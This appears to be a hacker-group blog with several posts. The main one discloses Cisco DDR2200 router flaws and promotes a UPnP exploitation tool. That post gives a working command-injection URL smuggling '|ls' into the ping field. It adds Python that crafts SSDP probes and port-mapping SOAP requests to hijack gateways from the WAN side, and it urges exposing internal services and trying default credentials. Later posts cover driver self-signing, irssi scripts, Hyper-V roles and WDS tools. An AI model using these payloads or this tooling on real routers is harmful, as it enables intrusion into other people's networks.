Cisco DDR2200 ADSL2 Residential Gateway Router Vulnerabilities

I have discovered two vulnerabilities in the Cisco DDR2200 ADSL2 Residential Gateway Router. The first is that the device answers UPnP discovery (SSDP) packets and UPnP SOAP requests that arrive from outside its local area network, which lets an unauthenticated attacker on the WAN side add port forwards and redirect traffic. All of this can be exploited using dc414's Upnp Exploiter.

The second vulnerability is remote command execution in the web-based ping diagnostic. The pingAddr parameter is handed to a shell unfiltered, so you can inject a pipe "|" followed by your own command; the command runs on the router's shell and its output comes back in the page, as shown below.

Ping PoC: http://192.168.1.254/waitPingqry.cgi?showPingResult=1&pingAddr=127.0.0.1|ls

(Screenshot from 2013-04-15 of the output returned by the ping page.)
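To make the bug concrete, here is an added example (my own code, not the DDR2200 firmware) of the pattern behind it: the CGI's pingAddr value spliced straight into a shell command string, beside a hardened handler that allow-lists IP literals and hostnames and passes an argv list to the process with no shell in between. The CGI name and the exact ping command line are assumptions; the PoC URL is the one above.

```python
"""Ping-diagnostic handler: the vulnerable string splice beside a hardened
version. Added example, not the DDR2200 firmware; the CGI name and the
ping command line it runs are assumptions."""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 hostname: dot-separated labels of [a-z0-9-], no label starting
# or ending with '-', at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def ping_addr_from_url(url):
    """Pull pingAddr out of a waitPingqry.cgi request the way the CGI would."""
    return parse_qs(urlsplit(url).query).get("pingAddr", [""])[0]


def build_ping_command_vulnerable(ping_addr):
    """The pattern behind the bug: user input spliced into one shell string,
    which is what a system()/popen() call would receive. With the PoC value
    '127.0.0.1|ls' the shell runs ls after ping. Returned, never executed."""
    return f"ping -c 4 {ping_addr}"


def validate_ping_target(ping_addr):
    """Allow-list: an IPv4/IPv6 literal or a syntactically valid hostname.
    Pipes, semicolons, backticks, $(), spaces and leading '-' all fail."""
    try:
        return str(ipaddress.ip_address(ping_addr))
    except ValueError:
        pass
    if HOSTNAME_RE.match(ping_addr):
        return ping_addr.lower()
    raise ValueError(f"rejected ping target {ping_addr!r}")


def is_safe_ping_target(ping_addr):
    """Boolean form of validate_ping_target for quick checks."""
    try:
        validate_ping_target(ping_addr)
        return True
    except ValueError:
        return False


def build_ping_command_hardened(ping_addr):
    """argv list: no shell is involved, so metacharacters carry no meaning
    even if validation were ever bypassed; validation keeps '-' options out."""
    return ["ping", "-c", "4", validate_ping_target(ping_addr)]


def run_ping_hardened(ping_addr, timeout=10):
    """Execute the hardened command without a shell (needs a ping binary)."""
    result = subprocess.run(build_ping_command_hardened(ping_addr),
                            capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    poc = ("http://192.168.1.254/waitPingqry.cgi"
           "?showPingResult=1&pingAddr=127.0.0.1|ls")
    addr = ping_addr_from_url(poc)
    print("shell would receive:", build_ping_command_vulnerable(addr))
    try:
        build_ping_command_hardened(addr)
    except ValueError as err:
        print("hardened handler:", err)
```

The allow-list is the important part; quoting the value (e.g. with shlex.quote) would also stop the pipe, but validating the target and dropping the shell entirely leaves nothing for an attacker to argue with.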

Upnp Exploiter

dc414 and I are proud to introduce Upnp Exploiter, a UPnP scanner and exploitation tool. It has two scanning modes and two exploit options.

The first scanning mode is the target scan. You pick a single IP or an IP range, and the script sends each host the UPnP discovery packet that is normally multicast to 239.255.255.250 on UDP port 1900. If a target responds, the script takes a closer look and tries to fetch its UPnP device profile, which tells us what type of device it is, which UPnP functions it supports, its IP, and other information. When used remotely, all of this depends on the target violating the UPnP specification by answering discovery requests from outside its local area network.

The second scanning mode only works inside a local area network: it just sends out the UPnP multicast discovery, using the protocol as intended.

Once it has a list of UPnP devices, the script mines each one for information such as device type, UPnP functions and IP. If a device is a gateway, it prompts you and asks whether you want to attempt to exploit it.

The first option is to forward ports. If you are on the LAN side, it is best to do some network recon with Nmap or similar first, find some fun services running on an internal server, and forward them to the Internet for later hacking. While gathering information on the device the script also pulls the list of ports already forwarded via UPnP and the device's internal IP, which is super helpful when working from the remote side. One of my personal favourites is forwarding the modem's own internal port 80 to port 81 on the WAN, which gives you the router's internal web UI for configuration. Most of the time the default creds will work for admin access >:)
This of course violates lots of RFCs, protocols and other rules, lol.

The second exploit option tries to turn a gateway device into a proxy. It works by IP address, one host per port: to reach Victim A on port 80, you use the script to forward everything arriving on a port of your choosing (say 88) on Victim B, the gateway device, to Victim A on port 80. Connect to port 88 on Victim B and all the traffic is relayed to Victim A on port 80. This only works because the gateway does not check that the internal client address in the mapping is actually on its LAN, which also breaks the UPnP rules, but who cares.
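As an added example (my code, not the Upnp Exploiter source), here are the protocol messages the scanner and both exploit options depend on: the SSDP M-SEARCH that the target scan unicasts to a WAN address, the parsing of a reply and of the device description to find the WANIPConnection control URL, and the SOAP AddPortMapping and GetGenericPortMappingEntry requests used to add the port-80-to-81 forward, the one-host-per-port proxy mapping, and to list existing forwards. The SSDP reply and device description below are constructed samples, and the 192.168.1.254 addresses and control URL are assumptions.

```python
"""SSDP discovery and IGD port-mapping request builder.

Added example (not the Upnp Exploiter source): builds the same protocol
messages the tool relies on so the flow can be inspected offline. The SSDP
reply and device description at the bottom are constructed samples."""
import socket
import xml.etree.ElementTree as ET
from urllib.parse import urljoin

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
DEV_NS = "urn:schemas-upnp-org:device-1-0"


def build_msearch(st=IGD_ST, mx=2):
    """SSDP M-SEARCH. A compliant gateway only honours this from its LAN;
    the target scan unicasts it to a WAN address and sees who answers."""
    return (
        "M-SEARCH * HTTP/1.1\r\n"
        f"HOST: {SSDP_ADDR}:{SSDP_PORT}\r\n"
        'MAN: "ssdp:discover"\r\n'
        f"MX: {mx}\r\n"
        f"ST: {st}\r\n\r\n"
    ).encode()


def parse_ssdp_response(raw):
    """Headers of an SSDP '200 OK' reply as a dict (names upper-cased), else None."""
    lines = raw.decode("latin-1").split("\r\n")
    if not lines[0].upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().upper()] = value.strip()
    return headers


def find_wanip_control_url(description_xml, location):
    """Walk the device description (fetched from the LOCATION header) for the
    WANIPConnection service and return its absolute controlURL, or None."""
    root = ET.fromstring(description_xml)
    for svc in root.iter(f"{{{DEV_NS}}}service"):
        if svc.findtext(f"{{{DEV_NS}}}serviceType") == WANIP:
            return urljoin(location, svc.findtext(f"{{{DEV_NS}}}controlURL", ""))
    return None


def build_soap(action, args):
    """HTTP headers and SOAP envelope for one WANIPConnection action."""
    body = "".join(f"<{k}>{v}</{k}>" for k, v in args)
    envelope = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{WANIP}">{body}</u:{action}></s:Body>'
        "</s:Envelope>"
    )
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{WANIP}#{action}"'}
    return headers, envelope


def add_port_mapping(ext_port, internal_client, int_port, proto="TCP", desc="upnp-test"):
    """AddPortMapping. external 81 -> <gateway LAN IP>:80 exposes the router's
    own web UI; pointing internal_client at another host is the proxy trick
    (one host per external port)."""
    return build_soap("AddPortMapping", [
        ("NewRemoteHost", ""), ("NewExternalPort", ext_port), ("NewProtocol", proto),
        ("NewInternalPort", int_port), ("NewInternalClient", internal_client),
        ("NewEnabled", 1), ("NewPortMappingDescription", desc), ("NewLeaseDuration", 0),
    ])


def get_mapping_entry(index):
    """GetGenericPortMappingEntry: call with index 0, 1, 2, ... until the device
    returns an error to enumerate existing forwards (the recon step)."""
    return build_soap("GetGenericPortMappingEntry", [("NewPortMappingIndex", index)])


def probe(target_ip, timeout=2.0):
    """Live unicast probe of one host (needs a network; not run by the test)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_msearch(), (target_ip, SSDP_PORT))
        try:
            return parse_ssdp_response(sock.recv(4096))
        except socket.timeout:
            return None


# Constructed sample data, not captured from a real DDR2200.
SAMPLE_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"LOCATION: http://192.168.1.254:49152/gatedesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 Constructed/1.0\r\n"
    b"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::"
    b"urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"
)
SAMPLE_DESC = f"""<root xmlns="{DEV_NS}"><device>
<deviceType>{IGD_ST}</deviceType><friendlyName>Constructed IGD</friendlyName>
<deviceList><device><deviceList><device><serviceList><service>
<serviceType>{WANIP}</serviceType><controlURL>/upnp/control/WANIPConn1</controlURL>
</service></serviceList></device></deviceList></device></deviceList>
</device></root>"""

if __name__ == "__main__":
    hdrs = parse_ssdp_response(SAMPLE_REPLY)
    print("control URL:", find_wanip_control_url(SAMPLE_DESC, hdrs["LOCATION"]))
    print(add_port_mapping(81, "192.168.1.254", 80)[1])
```

Sending an action is a plain HTTP POST of the envelope, with those two headers, to the control URL. A gateway that accepts AddPortMapping with a NewInternalClient that is not on its LAN is exactly what makes the proxy option work; a gateway that answers the M-SEARCH on its WAN interface at all is the first vulnerability described above.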

The last little thing the script does is parse the replies for the unique_service_name() vulnerability and report anything it finds, along with some helpful information to aid in exploiting it.

You can get the script from the git page HERE. If you like it, please consider donating to dc414 or to me (Anarchy Angel – anarchy@new.dc414.org) for taking the time to make such an awesome script 🙂 If anyone would like to help with development, please contact Anarchy Angel (me).

Many thanks to Ngharo for help with the regex and list stuff.

April meeting recap

April's meeting was awesome! Ngharo started us off with room introductions, which was helpful considering all the new faces at this meeting. Next I gave a quick demo of my new tool Upnp Exploiter, which led to me disclosing two 0day vulnerabilities in the Cisco DDR2200 ADSL2 Residential Gateway Router ("expect more on all this later"!). Then dw5304 gave his SNMP demo again and showed all the n00bs how to pwn Cisco routers by using SNMP to upload your own config to them. Then we all started messing around with trying to draw words on an oscilloscope with my Arduino. Because of a late start that is all we had time for. Congrats to BigStarHero for winning an Emerson switch board in the free junk giveaway! Here are some pictures from the meeting.

Free junk giveaway big winner!

Windows 8/Server 2012 unsigned driver hell no more.

So I have this nice new computer that I built with an ASUS P9X79 motherboard, and I wanted to turn it into a Server 2012 box for some stuff. After loading the OS I found out that the NIC is "incompatible", since Intel considers it a desktop board that should not be used in a server. I went looking through the INF file and found that the driver was deliberately excluding the board's hardware IDs:

[ControlFlags]
ExcludeFromSelect = \
PCI\VEN_8086&DEV_1502,\
PCI\VEN_8086&DEV_1503

Well this sucks…. lets fix it.

I then removed the ExcludeFromSelect line and the two lines following it.

I went to install the modified driver and ended up with the error in the screenshot below: the edited INF no longer matched the hash recorded in the driver's catalog (.cat) file.

Well, at least I know the catalog check works :). Now let's fix the catalog's hash.

A hunt on Google told me I needed inf2cat, which ships with the Windows Driver Kit, so let's download it here.

inf2cat /driver:"C:\Driver" /os:8_X64

My new catalog was created :).
I went and tried installing my new driver once again and, damn :(, "digital signature is missing". How the hell am I going to fix that, I thought.

A little more searching turned up that we can make a self-signed certificate and sign the catalog with it, "he he"... nice try, Microsoft.

So let's get this sucker signed. makecert and signtool are part of the Windows SDK; download here.

makecert -r -n "CN=Intelnic" -pe -ss MyCertStore -sr LocalMachine

Next I exported this cert with its private key so I could import it into "Trusted Root CAs" and "Trusted Publishers" on the machine where I was building the driver and on the target machine I wanted to install it on :). Note that only the public certificate (.cer) needs to go into those two stores; the private key should stay on the signing machine, because anything signed with it will now install on the target without a prompt.

Now that the cert is imported, let's sign this sucker:
signtool sign /s MyCertStore /n "Intelnic" /t http://timestamp.verisign.com/scripts/timestamp.dll "C:\Driver\e1c63x64.cat"

Back on the server I installed the cert into Trusted Root CAs and Trusted Publishers and, hey look, my NIC now works :).

it works

Thanks, Microsoft, for making a "secure" OS that insists on signed drivers... but wait, I just signed it myself, so much for that idea. To be fair, the kernel was not fooled here: the Intel .sys file was never touched and keeps whatever signature Intel gave it, which is what the kernel's code-integrity check looks at when the driver loads. What the self-signed catalog satisfies is the PnP installer's package check, and only because that machine was told to trust my certificate. Anyone holding that private key can now get a driver package installed there without a prompt, so guard the key, or remove the cert from the server's Trusted Root and Trusted Publishers stores once the NIC is working.

March meeting madness!

The March meeting was no letdown: we had lots of people and, as always, great demos. Ngharo got it started with a make-your-own Pringles-can cantenna workshop; nine lucky attendees got to make and take home their own cantenna! Then he kept it going with a quick demo of Radio Mobile and how to use it to plan a long-range wireless mesh network. Then the professor gave a demo of Metasploit, using a Java exploit to root a Windows box. dw5304 took over and gave a little demo of a hacked Xbox 360, using a laptop to control everything the console does. Here are some pictures from the meeting. Congrats to uberushaximus for winning 100 free hours of AOL high speed!!

Bucketworks PA project

Earlier last week I ended up building a new PA system for Bucketworks. What most people won't realize is that everything at Bucketworks is hacked together, and this is no different. I was asked to make a low-power radio system for notifying people inside Bucketworks about visitors at the door and for other uses; since that would have meant filing for an FCC licence, I decided to go another route, and the Bucketworks PA project was born.

During our wandering around Bucketworks, we (Paul, Eli and I) had come across many things, one of which was an old PA speaker, and I got to thinking: does it still work? After discovering we had a bad 1/4" cable, I wired one up to an amp we found in the basement, along with an old audio mixer, seen below.

And lo and behold, it worked.
https://www.youtube.com/embed/Lehy4tTpVCg

The next step was to figure out where the rest of the speakers were located and where to run the wires back to the server room, where we were going to keep the audio equipment. We ended up finding a total of 5 speakers, wired them in, and played some Pandora over the new PA system. I had to modify a cable to go from the "server" to the audio board.

I then set about making the Bucketworks PA bot. The bot is a Windows client that logs into an IRC channel and originally just passed the channel text to a text-to-speech function over the sound board. I expanded it to authenticate users, read NOAA weather warnings, play music, tell the time, and a few other functions.

After showing it to a few guys we ended up hearing this, and we all started laughing.

And the Bucketworks PA project was complete.
If there is any interest I will upload the code.

Some awesome useful irssi scripts.

If you don't already know, to use scripts you have to put them in:

/home/< your_user >/.irssi/scripts/

And to load one into irssi use:

/script load < script_name.pl >

adv_windowlist.pl – If you have lots of windows open in irssi like me, this script will make your life much easier. It adds a permanent advanced window list in a statusbar by default; you can configure it to put the list in a sidebar if you like.

trackbar.pl – This little script does just one thing: it draws a line each time you switch away from a window, so you always know how far you have read in that window 🙂 It also removes the previously drawn line, so you don't see double lines.

nickcolor.pl – In channels with lots of activity, every nick in the same old white colour gets a little crazy; this script gives each user their own colour and brings a little organization to the chaos.

spell.pl – Spell check for irssi. This script takes a little setup: first you have to install ispell and Lingua::Ispell with the following command:

$ sudo apt-get install ispell liblingua-ispell-perl

It should pull in a number of other packages, including a dictionary. I actually got an error as well, but it seems safe to ignore:

error in control file: `Index' value missing for format `info' at /usr/sbin/install-docs line 709, line 16.

Now load the script into irssi and bind Alt-s as a shortcut to check the line you are about to send. To bind Alt-s, type the following into irssi:

/bind meta-s /_spellcheck

Also set the max guesses:

/set spell_max_guesses 3

Now you're ready to use the script. After you type a message, before you hit Enter, hit Alt-s; the script flags any misspelled words and gives you up to three guesses for the correction.

Hyper-V user rights assignment

If you are like most admins you have a bunch of support staff, and sometimes it is just easier to give them access to Hyper-V than to have them wait for an admin to complete a simple task (e.g. make a snapshot). The only issue with this is that they can then do things we don't want, for instance turn a machine off, reboot it, change settings like NICs, or create new machines. So I went looking, and there is a way to restrict this; this post shows how.

Assigning rights to Hyper-V
Open mmc.exe

Click File, then Add/Remove Snap-in

Select Authorization Manager, hit Add, then OK

Then right-click and choose Open Authorization Store...

Select XML file, then hit Browse

Go to \\Server_name\c$\ProgramData\Microsoft\Windows\Hyper-V\ and select InitialStore.xml

Then hit OK


Role Assignments
Select the role we want to assign, in this case Administrator

Right-click, click Assign Users and Groups, then choose From Windows and Active Directory...

Enter the username you want to assign rights to, and hit OK

That user now has admin rights on Hyper-V. The Administrator role in InitialStore.xml carries every Hyper-V operation, so give it only to people who should have full control; for support staff, build a narrower role as described next.

Creating new role definitions
(what rights does this group have?)
Expand InitialStore.xml -> Hyper-V services -> Definitions -> Role Definitions

Right-click Role Definitions and click New Role Definition

Then enter a name and click Add...

Select Operations tab

Then add the rights you want that role to have by ticking their checkboxes, and hit OK, OK.

Now that we have a new role definition, we need to create a role assignment for it; see the next section.

Role Assignments
Right-click Role Assignments and choose New Role Assignment

Select the role that has just been defined

And hit OK

Now add users to this assignment, as described under Role Assignments above.

WDS Manager on Windows 8

Apparently Microsoft once again did not include WDS Manager in their Server 2012 RSAT (Remote Server Administration Tools)...
To enable remote WDS control, put the following script in a batch file and run batchfile.bat wdsservername from an elevated prompt (you need admin rights on the WDS server for the c$ share, and the server must be the same architecture as your workstation, since these are native DLLs):

copy \\%1\c$\windows\system32\WdsMgmt.msc c:\windows\system32\WdsMgmt.msc
copy \\%1\c$\windows\system32\en-US\WdsMgmt.msc c:\windows\system32\en-US\WdsMgmt.msc
copy \\%1\c$\windows\system32\wdsmgmt.dll c:\windows\system32\wdsmgmt.dll
copy \\%1\c$\windows\system32\en-US\wdsmgmt.dll.mui c:\windows\system32\en-US\wdsmgmt.dll.mui
copy \\%1\c$\windows\system32\WdsImage.dll c:\windows\system32\WdsImage.dll
copy \\%1\c$\windows\system32\en-US\WdsImage.dll.mui c:\windows\system32\en-US\WdsImage.dll.mui
copy \\%1\c$\windows\system32\wdscsl.dll c:\windows\system32\wdscsl.dll
copy \\%1\c$\windows\system32\wdstptc.dll c:\windows\system32\wdstptc.dll
copy \\%1\c$\windows\system32\WdsTptMgmt.dll c:\windows\system32\WdsTptMgmt.dll
copy \\%1\c$\windows\system32\en-US\WdsTptMgmt.dll.mui c:\windows\system32\en-US\WdsTptMgmt.dll.mui
copy \\%1\c$\windows\system32\wdsmmc.dll c:\windows\system32\wdsmmc.dll
copy \\%1\c$\windows\system32\en-US\wdsmmc.dll.mui c:\windows\system32\en-US\wdsmmc.dll.mui
regsvr32 WdsMgmt.dll
regsvr32 WdsTptMgmt.dll
regsvr32 WdsMmc.dll

Once you have, it is possible to remotely manage the WDS servers on your network by typing WdsMgmt.msc into Search.